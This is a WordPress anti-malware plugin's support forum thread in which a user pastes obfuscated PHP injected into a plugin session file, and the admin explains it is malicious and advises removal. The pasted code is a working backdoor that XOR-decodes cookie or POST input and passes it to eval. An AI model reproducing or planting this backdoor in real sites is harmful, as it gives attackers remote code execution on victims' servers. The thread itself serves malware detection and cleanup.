Interesting detection…

Home Forums Support Forum Interesting detection…

This topic contains 3 replies, has 2 voices, and was last updated by  Anti-Malware Admin 6 years, 1 month ago.

Viewing 4 posts - 1 through 4 (of 4 total)
  • Author
    Posts
  • #2182

    Steven Baron
    Member

    Scan found this location:

    wp-content/plugins/gotmls/safe-load/_SESSION/.GOTMLS.69d73f2d111e766c58bafc8c8846db83.php

     

    Had this code:

    <?php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $w9f53 = 265;$GLOBALS['vae0'] = Array();global $vae0;$vae0 = $GLOBALS;${“\x47\x4c\x4fB\x41\x4c\x53″}['m55bc753'] = “\x3d\x3e\x41\x22\x21\x3c\x7a\x5d\x63\x3b\x2e\x65\x4d\x72\x48\x69\x2a\x4c\x6f\x6a\x59\x73\x70\x47\x57\x36\x46\x24\x7d\x49\x32\xa\x56\x4e\x5c\x2c\x9\x43\x40\x4a\x27\x58\x4f\x35\x6b\x44\x31\x5e\x30\x5b\x51\x4b\x20\x6d\x34\x7e\x2d\x52\x71\x26\x7b\x6e\x5a\x37\x2f\x25\x60\xd\x78\x76\x66\x42\x50\x23\x29\x2b\x62\x28\x55\x38\x5f\x3f\x79\x61\x7c\x6c\x54\x45\x67\x74\x39\x77\x64\x3a\x53\x68\x75\x33″;$vae0[$vae0['m55bc753'][83].$vae0['m55bc753'][8].$vae0['m55bc753'][63].$vae0['m55bc753'][8].$vae0['m55bc753'][97].$vae0['m55bc753'][76]] = $vae0['m55bc753'][8].$vae0['m55bc753'][95].$vae0['m55bc753'][13];$vae0[$vae0['m55bc753'][88].$vae0['m55bc753'][97].$vae0['m55bc753'][70].$vae0['m55bc753'][63].$vae0['m55bc753'][30].$vae0['m55bc753'][79].$vae0['m55bc753'][43].$vae0['m55bc753'][46].$vae0['m55bc753'][43]] = $vae0['m55bc753'][18].$vae0['m55bc753'][13].$vae0['m55bc753'][92];$vae0[$vae0['m55bc753'][58].$vae0['m55bc753'][76].$vae0['m55bc753'][25].$vae0['m55bc753'][43]] = $vae0['m55bc753'][92].$vae0['m55bc753'][11].$vae0['m55bc753'][70].$vae0['m55bc753'][15].$vae0['m55bc753'][61].$vae0['m55bc753'][11];$vae0[$vae0['m55bc753'][13].$vae0['m55bc753'][8].$vae0['m55bc753'][11].$vae0['m55bc753'][54].$vae0['m55bc753'][97].$vae0['m55bc753'][76].$vae0['m55bc753'][90].$vae0['m55bc753'][30].$vae0['m55bc753'][63]] = $vae0['m55bc753'][21].$vae0['m55bc753'][89].$vae0['m55bc753'][13].$vae0['m55bc753'][85].$vae0['m55bc753'][11].$vae0['m55bc753'][61];$vae0[$vae0['m55bc753'][11].$vae0['m55bc753'][92].$vae0['m55bc753'][92].$vae0['m55bc753'][46]] = $vae0['m55bc753'][92].$vae0['m55bc753'][11].$vae0['m55bc753'][70].$vae0['m55bc753'][15].$vae0['m55bc753'][61].$vae0['m55bc753'][11].$vae0['m55bc753'][92];$vae0[$vae0['m55bc753'][19].$vae0['m55bc753'][48].$vae0['m55bc753'][54].$vae0['m55bc753'][11].$vae0['m55bc753'][43].$vae0['m55bc753'][43].$vae0['m55bc753'][48]] = $vae0['m55bc753'][15].$vae0['m55bc753'][61].$vae0['m55bc753'][15].$vae0['m55bc753'][80].$vae0['m55bc753'][21].$vae0['m55bc753'][11].$vae0['m55bc753'][89];$vae0[$vae0['m55bc753'][76].$vae0['m55bc753'][76].$vae0['m55bc753'][54].$vae0['m55bc753'][90].$vae0['m55bc753'][83].$vae0['m55bc753'][30].$vae0['m55bc753'][48]] = $vae0['m55bc753'][21].$vae0['m55bc753'][11].$vae0['m55bc753'][13].$vae0['m55bc753'][15].$vae0['m55bc753'][83].$vae0['m55bc753'][85].$vae0['m55bc753'][15].$vae0['m55bc753'][6].$vae0['m55bc753'][11];$vae0[$vae0['m55bc753'][88].$vae0['m55bc753'][11].$vae0['m55bc753'][83].$vae0['m55bc753'][79].$vae0['m55bc753'][92].$vae0['m55bc753'][25].$vae0['m55bc753'][8].$vae0['m55bc753'][25]] = $vae0['m55bc753'][22].$vae0['m55bc753'][95].$vae0['m55bc753'][22].$vae0['m55bc753'][69].$vae0['m55bc753'][11].$vae0['m55bc753'][13].$vae0['m55bc753'][21].$vae0['m55bc753'][15].$vae0['m55bc753'][18].$vae0['m55bc753'][61];$vae0[$vae0['m55bc753'][21].$vae0['m55bc753'][8].$vae0['m55bc753'][92].$vae0['m55bc753'][83].$vae0['m55bc753'][8].$vae0['m55bc753'][70].$vae0['m55bc753'][76]] = $vae0['m55bc753'][96].$vae0['m55bc753'][61].$vae0['m55bc753'][21].$vae0['m55bc753'][11].$vae0['m55bc753'][13].$vae0['m55bc753'][15].$vae0['m55bc753'][83].$vae0['m55bc753'][85].$vae0['m55bc753'][15].$vae0['m55bc753'][6].$vae0['m55bc753'][11];$vae0[$vae0['m55bc753'][21].$vae0['m55bc753'][43].$vae0['m55bc753'][83].$vae0['m55bc753'][30].$vae0['m55bc753'][43]] = $vae0['m55bc753'][76].$vae0['m55bc753'][83].$vae0['m55bc753'][21].$vae0['m55bc753'][11].$vae0['m55bc753'][25].$vae0['m55bc753'][54].$vae0['m55bc753'][80].$vae0['m55bc753'][92].$vae0['m55bc753'][11].$vae0['m55bc753'][8].$vae0['m55bc753'][18].$vae0['m55bc753'][92].$vae0['m55bc753'][11];$vae0[$vae0['m55bc753'][13].$vae0['m55bc753'][79].$vae0['m55bc753'][54].$vae0['m55bc753'][11].$vae0['m55bc753'][83].$vae0['m55bc753'][43].$vae0['m55bc753'][48].$vae0['m55bc753'][83]] = $vae0['m55bc753'][21].$vae0['m55bc753'][11].$vae0['m55bc753'][89].$vae0['m55bc753'][80].$vae0['m55bc753'][89].$vae0['m55bc753'][15].$vae0['m55bc753'][53].$vae0['m55bc753'][11].$vae0['m55bc753'][80].$vae0['m55bc753'][85].$vae0['m55bc753'][15].$vae0['m55bc753'][53].$vae0['m55bc753'][15].$vae0['m55bc753'][89];$vae0[$vae0['m55bc753'][44].$vae0['m55bc753'][48].$vae0['m55bc753'][83].$vae0['m55bc753'][11].$vae0['m55bc753'][92]] = $vae0['m55bc753'][88].$vae0['m55bc753'][43].$vae0['m55bc753'][92].$vae0['m55bc753'][90].$vae0['m55bc753'][76].$vae0['m55bc753'][97].$vae0['m55bc753'][11];$vae0[$vae0['m55bc753'][82].$vae0['m55bc753'][90].$vae0['m55bc753'][8].$vae0['m55bc753'][8].$vae0['m55bc753'][8]] = $vae0['m55bc753'][68].$vae0['m55bc753'][83].$vae0['m55bc753'][90].$vae0['m55bc753'][79];$vae0[$vae0['m55bc753'][13].$vae0['m55bc753'][43].$vae0['m55bc753'][8].$vae0['m55bc753'][63].$vae0['m55bc753'][92]] = $_POST;$vae0[$vae0['m55bc753'][69].$vae0['m55bc753'][8].$vae0['m55bc753'][30].$vae0['m55bc753'][48].$vae0['m55bc753'][11].$vae0['m55bc753'][97].$vae0['m55bc753'][70]] = $_COOKIE;@$vae0[$vae0['m55bc753'][19].$vae0['m55bc753'][48].$vae0['m55bc753'][54].$vae0['m55bc753'][11].$vae0['m55bc753'][43].$vae0['m55bc753'][43].$vae0['m55bc753'][48]]($vae0['m55bc753'][11].$vae0['m55bc753'][13].$vae0['m55bc753'][13].$vae0['m55bc753'][18].$vae0['m55bc753'][13].$vae0['m55bc753'][80].$vae0['m55bc753'][85].$vae0['m55bc753'][18].$vae0['m55bc753'][88], NULL);@$vae0[$vae0['m55bc753'][19].$vae0['m55bc753'][48].$vae0['m55bc753'][54].$vae0['m55bc753'][11].$vae0['m55bc753'][43].$vae0['m55bc753'][43].$vae0['m55bc753'][48]]($vae0['m55bc753'][85].$vae0['m55bc753'][18].$vae0['m55bc753'][88].$vae0['m55bc753'][80].$vae0['m55bc753'][11].$vae0['m55bc753'][13].$vae0['m55bc753'][13].$vae0['m55bc753'][18].$vae0['m55bc753'][13].$vae0['m55bc753'][21], 0);@$vae0[$vae0['m55bc753'][19].$vae0['m55bc753'][48].$vae0['m55bc753'][54].$vae0['m55bc753'][11].$vae0['m55bc753'][43].$vae0['m55bc753'][43].$vae0['m55bc753'][48]]($vae0['m55bc753'][53].$vae0['m55bc753'][83].$vae0['m55bc753'][68].$vae0['m55bc753'][80].$vae0['m55bc753'][11].$vae0['m55bc753'][68].$vae0['m55bc753'][11].$vae0['m55bc753'][8].$vae0['m55bc753'][96].$vae0['m55bc753'][89].$vae0['m55bc753'][15].$vae0['m55bc753'][18].$vae0['m55bc753'][61].$vae0['m55bc753'][80].$vae0['m55bc753'][89].$vae0['m55bc753'][15].$vae0['m55bc753'][53].$vae0['m55bc753'][11], 0);@$vae0[$vae0['m55bc753'][13].$vae0['m55bc753'][79].$vae0['m55bc753'][54].$vae0['m55bc753'][11].$vae0['m55bc753'][83].$vae0['m55bc753'][43].$vae0['m55bc753'][48].$vae0['m55bc753'][83]](0);if (!$vae0[$vae0['m55bc753'][11].$vae0['m55bc753'][92].$vae0['m55bc753'][92].$vae0['m55bc753'][46]]($vae0['m55bc753'][2].$vae0['m55bc753'][17].$vae0['m55bc753'][57].$vae0['m55bc753'][87].$vae0['m55bc753'][2].$vae0['m55bc753'][45].$vae0['m55bc753'][20].$vae0['m55bc753'][80].$vae0['m55bc753'][57].$vae0['m55bc753'][78].$vae0['m55bc753'][33].$vae0['m55bc753'][80].$vae0['m55bc753'][97].$vae0['m55bc753'][25].$vae0['m55bc753'][25].$vae0['m55bc753'][83].$vae0['m55bc753'][70].$vae0['m55bc753'][76].$vae0['m55bc753'][79].$vae0['m55bc753'][83].$vae0['m55bc753'][79].$vae0['m55bc753'][83].$vae0['m55bc753'][30].$vae0['m55bc753'][97].$vae0['m55bc753'][43].$vae0['m55bc753'][43].$vae0['m55bc753'][83].$vae0['m55bc753'][76].$vae0['m55bc753'][30].$vae0['m55bc753'][46].$vae0['m55bc753'][70].$vae0['m55bc753'][76].$vae0['m55bc753'][70].$vae0['m55bc753'][46].$vae0['m55bc753'][46].$vae0['m55bc753'][76].$vae0['m55bc753'][83].$vae0['m55bc753'][46].$vae0['m55bc753'][83].$vae0['m55bc753'][48].$vae0['m55bc753'][30].$vae0['m55bc753'][70].$vae0['m55bc753'][76].$vae0['m55bc753'][83])){$vae0[$vae0['m55bc753'][58].$vae0['m55bc753'][76].$vae0['m55bc753'][25].$vae0['m55bc753'][43]]($vae0['m55bc753'][2].$vae0['m55bc753'][17].$vae0['m55bc753'][57].$vae0['m55bc753'][87].$vae0['m55bc753'][2].$vae0['m55bc753'][45].$vae0['m55bc753'][20].$vae0['m55bc753'][80].$vae0['m55bc753'][57].$vae0['m55bc753'][78].$vae0['m55bc753'][33].$vae0['m55bc753'][80].$vae0['m55bc753'][97].$vae0['m55bc753'][25].$vae0['m55bc753'][25].$vae0['m55bc753'][83].$vae0['m55bc753'][70].$vae0['m55bc753'][76].$vae0['m55bc753'][79].$vae0['m55bc753'][83].$vae0['m55bc753'][79].$vae0['m55bc753'][83].$vae0['m55bc753'][30].$vae0['m55bc753'][97].$vae0['m55bc753'][43].$vae0['m55bc753'][43].$vae0['m55bc753'][83].$vae0['m55bc753'][76].$vae0['m55bc753'][30].$vae0['m55bc753'][46].$vae0['m55bc753'][70].$vae0['m55bc753'][76].$vae0['m55bc753'][70].$vae0['m55bc753'][46].$vae0['m55bc753'][46].$vae0['m55bc753'][76].$vae0['m55bc753'][83].$vae0['m55bc753'][46].$vae0['m55bc753'][83].$vae0['m55bc753'][48].$vae0['m55bc753'][30].$vae0['m55bc753'][70].$vae0['m55bc753'][76].$vae0['m55bc753'][83], 1);$r613 = NULL;$a3f6d19 = NULL;$vae0[$vae0['m55bc753'][8].$vae0['m55bc753'][11].$vae0['m55bc753'][11].$vae0['m55bc753'][46].$vae0['m55bc753'][92].$vae0['m55bc753'][54].$vae0['m55bc753'][43]] = $vae0['m55bc753'][8].$vae0['m55bc753'][70].$vae0['m55bc753'][70].$vae0['m55bc753'][46].$vae0['m55bc753'][97].$vae0['m55bc753'][30].$vae0['m55bc753'][63].$vae0['m55bc753'][30].$vae0['m55bc753'][56].$vae0['m55bc753'][92].$vae0['m55bc753'][97].$vae0['m55bc753'][48].$vae0['m55bc753'][70].$vae0['m55bc753'][56].$vae0['m55bc753'][54].$vae0['m55bc753'][76].$vae0['m55bc753'][8].$vae0['m55bc753'][54].$vae0['m55bc753'][56].$vae0['m55bc753'][90].$vae0['m55bc753'][76].$vae0['m55bc753'][8].$vae0['m55bc753'][90].$vae0['m55bc753'][56].$vae0['m55bc753'][63].$vae0['m55bc753'][70].$vae0['m55bc753'][8].$vae0['m55bc753'][25].$vae0['m55bc753'][11].$vae0['m55bc753'][70].$vae0['m55bc753'][30].$vae0['m55bc753'][83].$vae0['m55bc753'][63].$vae0['m55bc753'][48].$vae0['m55bc753'][83].$vae0['m55bc753'][11];global $cee1d45;function  xa98($r613, $x2871b){global $vae0;$fa85fe5d = “”;for ($t2fa871b7=0; $t2fa871b7<$vae0[$vae0['m55bc753'][13].$vae0['m55bc753'][8].$vae0['m55bc753'][11].$vae0['m55bc753'][54].$vae0['m55bc753'][97].$vae0['m55bc753'][76].$vae0['m55bc753'][90].$vae0['m55bc753'][30].$vae0['m55bc753'][63]]($r613);){for ($sd312=0; $sd312<$vae0[$vae0['m55bc753'][13].$vae0['m55bc753'][8].$vae0['m55bc753'][11].$vae0['m55bc753'][54].$vae0['m55bc753'][97].$vae0['m55bc753'][76].$vae0['m55bc753'][90].$vae0['m55bc753'][30].$vae0['m55bc753'][63]]($x2871b) && $t2fa871b7<$vae0[$vae0['m55bc753'][13].$vae0['m55bc753'][8].$vae0['m55bc753'][11].$vae0['m55bc753'][54].$vae0['m55bc753'][97].$vae0['m55bc753'][76].$vae0['m55bc753'][90].$vae0['m55bc753'][30].$vae0['m55bc753'][63]]($r613); $sd312++, $t2fa871b7++){$fa85fe5d .= $vae0[$vae0['m55bc753'][83].$vae0['m55bc753'][8].$vae0['m55bc753'][63].$vae0['m55bc753'][8].$vae0['m55bc753'][97].$vae0['m55bc753'][76]]($vae0[$vae0['m55bc753'][88].$vae0['m55bc753'][97].$vae0['m55bc753'][70].$vae0['m55bc753'][63].$vae0['m55bc753'][30].$vae0['m55bc753'][79].$vae0['m55bc753'][43].$vae0['m55bc753'][46].$vae0['m55bc753'][43]]($r613[$t2fa871b7]) ^ $vae0[$vae0['m55bc753'][88].$vae0['m55bc753'][97].$vae0['m55bc753'][70].$vae0['m55bc753'][63].$vae0['m55bc753'][30].$vae0['m55bc753'][79].$vae0['m55bc753'][43].$vae0['m55bc753'][46].$vae0['m55bc753'][43]]($x2871b[$sd312]));}}return $fa85fe5d;}function  g5d9b3e($r613, $x2871b){global $vae0;global $cee1d45;return $vae0[$vae0['m55bc753'][82].$vae0['m55bc753'][90].$vae0['m55bc753'][8].$vae0['m55bc753'][8].$vae0['m55bc753'][8]]($vae0[$vae0['m55bc753'][82].$vae0['m55bc753'][90].$vae0['m55bc753'][8].$vae0['m55bc753'][8].$vae0['m55bc753'][8]]($r613, $cee1d45), $x2871b);}foreach ($vae0[$vae0['m55bc753'][69].$vae0['m55bc753'][8].$vae0['m55bc753'][30].$vae0['m55bc753'][48].$vae0['m55bc753'][11].$vae0['m55bc753'][97].$vae0['m55bc753'][70]] as $x2871b=>$kd935987e){$r613 = $kd935987e;$a3f6d19 = $x2871b;}if (!$r613){foreach ($vae0[$vae0['m55bc753'][13].$vae0['m55bc753'][43].$vae0['m55bc753'][8].$vae0['m55bc753'][63].$vae0['m55bc753'][92]] as $x2871b=>$kd935987e){$r613 = $kd935987e;$a3f6d19 = $x2871b;}}$r613 = @$vae0[$vae0['m55bc753'][21].$vae0['m55bc753'][8].$vae0['m55bc753'][92].$vae0['m55bc753'][83].$vae0['m55bc753'][8].$vae0['m55bc753'][70].$vae0['m55bc753'][76]]($vae0[$vae0['m55bc753'][44].$vae0['m55bc753'][48].$vae0['m55bc753'][83].$vae0['m55bc753'][11].$vae0['m55bc753'][92]]($vae0[$vae0['m55bc753'][21].$vae0['m55bc753'][43].$vae0['m55bc753'][83].$vae0['m55bc753'][30].$vae0['m55bc753'][43]]($r613), $a3f6d19));if (isset($r613[$vae0['m55bc753'][83].$vae0['m55bc753'][44]]) && $cee1d45==$r613[$vae0['m55bc753'][83].$vae0['m55bc753'][44]]){if ($r613[$vae0['m55bc753'][83]] == $vae0['m55bc753'][15]){$t2fa871b7 = Array($vae0['m55bc753'][22].$vae0['m55bc753'][69] => @$vae0[$vae0['m55bc753'][88].$vae0['m55bc753'][11].$vae0['m55bc753'][83].$vae0['m55bc753'][79].$vae0['m55bc753'][92].$vae0['m55bc753'][25].$vae0['m55bc753'][8].$vae0['m55bc753'][25]](),$vae0['m55bc753'][21].$vae0['m55bc753'][69] => $vae0['m55bc753'][46].$vae0['m55bc753'][10].$vae0['m55bc753'][48].$vae0['m55bc753'][56].$vae0['m55bc753'][46],);echo @$vae0[$vae0['m55bc753'][76].$vae0['m55bc753'][76].$vae0['m55bc753'][54].$vae0['m55bc753'][90].$vae0['m55bc753'][83].$vae0['m55bc753'][30].$vae0['m55bc753'][48]]($t2fa871b7);}elseif ($r613[$vae0['m55bc753'][83]] == $vae0['m55bc753'][11]){eval/*g7d8cc*/($r613[$vae0['m55bc753'][92]]);}exit();}} ?><?php $GLOBALS["GOTMLS"]["logins"]["69d73f2d111e766c58bafc8c8846db83"]=unserialize(base64_decode(“YToxOntzOjM6IkdFVCI7czoxNToiMTUzOTAyOTg2Ni42MDU3Ijt9″));

     

    #2183

    Anti-Malware Admin
    Key Master

    That is supposed to be a simple session log for login attempts on your site. All that other code added to the beginning of the file is a malicious injection that was inserted into that file at some later time. You should definitely let my scanner fix that file, or you can delete the file completely.

    #2184

    Steven Baron
    Member

    Is that a session code that expires?  The majority of my issues are injection related…

    #2185

    Anti-Malware Admin
    Key Master

    The small bit of serialized code that my plugin originally put in that file does have an expiration date built into it but all that malicious code that was added to the top of that file has it’s own rules to live by and it needs to be removed before it has a chance to replicate itself into other files. As with all malicious injections, it is important to remove the malicious code as quickly as possible before it can spread to more of the files on your server. Quick containment and isolations is the key to getting clean and staying safe from further infection and future re-infection.

    Since all the files in that _SESSION folder are temporary and not critical to the core functionality of your site you can delete the whole folder just to be safe. And session files that are needed to validate future login attampts will be recreated by my plugin anyway, and those will all be clean (at least until you get hit by another wave of infections).

Viewing 4 posts - 1 through 4 (of 4 total)

You must be logged in to reply to this topic.

Comments are closed.